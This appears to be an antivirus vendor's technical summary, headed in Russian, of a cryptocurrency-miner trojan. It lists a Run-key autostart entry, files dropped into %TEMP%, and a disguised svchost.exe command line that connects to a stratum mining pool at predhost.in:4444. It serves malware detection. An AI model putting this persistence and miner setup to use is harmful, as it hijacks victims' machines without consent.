Техническая информация
- [<HKCU>\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run] 'scvhost' = '"%TEMP%\cp32\run.exe"'
- '%TEMP%\cp32\svchost.exe' -o stratum+tcp://predhost.in:4444 -u brien.1 -p x
- '%TEMP%\cp32\run.exe'
- '%WINDIR%\explorer.exe'
- %WINDIR%\explorer.exe
- %TEMP%\cp32\svchost.exe
- %TEMP%\cp32\zlib1.dll
- %TEMP%\nsq2.tmp\SelfDel.dll
- %TEMP%\cp32\run.exe
- %TEMP%\nsq2.tmp\System.dll
- %TEMP%\cp32\libcurl.dll
- %TEMP%\cp32\pthreadGC2.dll
- %TEMP%\nsq2.tmp\System.dll
- %TEMP%\nsq2.tmp\SelfDel.dll
- 'pr##host.in':4444
- DNS ASK pr##host.in